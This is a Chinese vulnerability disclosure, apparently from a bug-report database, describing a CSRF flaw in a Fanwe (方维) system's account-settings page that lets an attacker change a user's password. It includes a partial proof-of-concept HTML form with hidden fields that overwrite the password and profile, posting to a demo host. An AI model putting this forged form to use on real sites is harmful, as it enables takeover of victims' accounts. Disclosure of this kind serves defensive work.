方维某系统漏洞可修改用户密码(demo演示、通用型)#2

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 方维某系统CSRF漏洞可修改用户密码(demo演示、通用型)#2,自己本地搭建测试了一下,果然通用型。 ### 详细说明: ### 漏洞证明: ``` http://t2.fanwe.net:82/index.php?ctl=uc_account ``` 在账户设置这里抓包了一下,发现没有任何的验证。现在我们构造一个表单,代码如下: ``` <html> <body> <form action="http://t2.fanwe.net:82/index.php?ctl=uc_account&act=save" method="POST"> <input type="hidden" name="email" value="296864045@qq.com" /> <input type="hidden" name="user_name" value="hackimg" /> <input type="hidden" name="user_pwd" value="hackimg" /> <input type="hidden" name="user_pwd_confirm" value="hackimg" /> <input type="hidden" name="avatar_file" value="" /> <input type="hidden" name="mobile" value="15768852222" /> <input type="hidden" name="province_id" value="6" /> <input type="hidden" name="city_id" value="76" /> <input type="hidden" name="byear" value="0" /> <input type="hidden" name="bmonth" value="0" /> <input type="hidden" name="bday" value="0" /> <input type="hidden" name="sex" value="1" /> <input type="hidden" name="my_intro" value="" /> <input type="hidden"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息